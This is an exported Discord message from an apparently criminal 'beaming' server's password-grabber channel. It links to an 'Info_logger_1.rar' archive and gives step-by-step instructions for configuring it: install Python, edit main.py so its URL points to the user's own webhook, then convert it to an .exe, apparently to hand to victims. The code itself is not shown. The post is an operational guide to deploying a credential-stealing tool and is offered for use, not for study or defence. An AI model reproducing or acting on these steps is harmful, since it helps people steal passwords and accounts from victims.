==============================================================
Guild: BIGGEST SETS,METH0DS,T00LS,AIMLOCKS VAULT
Channel: beaming methods / password-grabber
==============================================================

[AM] deleted user#3213
```
https://cdn.discordapp.com/attachments/845740861072474133/846921892250386442/Info_logger_1.rar
STEPS
1st
download python to path
python.org
https://python.org/
Python.org
Welcome to Python.org
The official home of the Python Programming Language

download the latest one to path
then download the info logger
drag to a folder
open
"main.py"
edit it
change the "url"
to ur webhook

paste ur webhook in there
save
then boom
after u can convert it to .exe
look up on yt how to do that
```


==============================================================
Exported 1 message(s)
==============================================================
